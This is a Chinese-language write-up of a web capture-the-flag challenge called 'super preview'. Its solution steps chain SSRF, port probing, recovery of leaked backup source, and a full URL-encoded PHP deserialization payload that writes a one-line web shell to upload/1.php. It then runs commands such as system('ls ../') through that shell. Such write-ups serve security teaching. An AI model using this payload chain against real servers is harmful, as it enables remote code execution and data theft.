### 1.题目名称
super preview
### 2.题目类型

web(middle hard)


### 3.题目描述

preview maybe faster


### 4.考察知识点

简单SSRF，代码审计，反序列化，url编码


### 5.解题思路

1. 打开页面后，发现一个shell.txt，以及页面源代码给出的php代码提示，猜测为SSRF
2. 根据SSRF，以及响应包header中的hint，猜测端口8080-808x，8080可访问到admin管理界面
3. 管理界面提示源码，尝试index.php.bak index.php~ .index.php.swp，找到base64编码后的源代码
4. 得到index.php源码，发现需要get传入data，从而反序列化，触发析构函数，析构函数会读取一个远程地址文件，写入本地
5. 结合shell.txt，构造反序列化`O%3A9%3A%22copy_file%22%3A3%3A%7Bs%3A4%3A%22path%22%3Bs%3A7%3A%22upload%2F%22%3Bs%3A4%3A%22file%22%3Bs%3A5%3A%221.php%22%3Bs%3A3%3A%22url%22%3Bs%3A29%3A%22http%3A%2F%2F127.0.0.1%3A80%2Fshell.txt%22%3B%7D`，提示上传成功/upload/1.php
6. 访问一句话，`/index.php?url=http://127.0.0.1:8080/upload/1.php`，执行命令`/index.php?url=http://127.0.0.1:8080/upload/1.php%3F0=system(%27ls%2520../%27)%3B`，例如`/index.php?url=http://127.0.0.1:8080/upload/1.php%3F0=system(%27head%2520../*%27)%3B`，得到flag
(手工构造时ls和../之间空格需要二次编码，即url=的内容需要额外urlencode)

